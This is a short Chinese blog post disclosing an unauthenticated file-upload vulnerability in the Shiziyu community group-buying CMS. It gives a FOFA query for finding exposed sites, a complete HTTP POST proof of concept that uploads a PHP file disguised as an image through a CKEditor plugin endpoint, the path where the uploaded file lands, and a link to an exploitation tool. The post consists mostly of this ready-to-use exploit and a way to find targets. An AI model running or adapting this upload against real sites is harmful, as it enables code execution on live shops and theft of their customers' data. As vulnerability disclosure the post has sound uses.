漏洞描述
网站系统为狮子鱼社区团购系统,网上用的也比较多,我fofa上搜了一下,大概有6-7千多。主要用户各种购物,本文主要介绍其中两个文件上传漏洞,漏洞复现以及漏洞工具分享。
漏洞影响
s ?
狮子鱼CMS
空间测绘
d ?
FOFA:"/seller.php?s=/Public/login"
漏洞复现
- POC
POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1
Host: ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
Connection: close
Content-Length: 206
------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="files"; filename="shenye.php"
Content-Type: image/gif
<?php echo('shenye');?>
------WebKitFormBoundary8UaANmWAgM4BqBSs—
接着在当前路径可以发现上传成功
/Common/image/uploads/163*****365.php
使用工具:https://github.com/GYLQ/shiziyu-upload
个人博客
孤桜懶契:https://gylq.gitee.io/time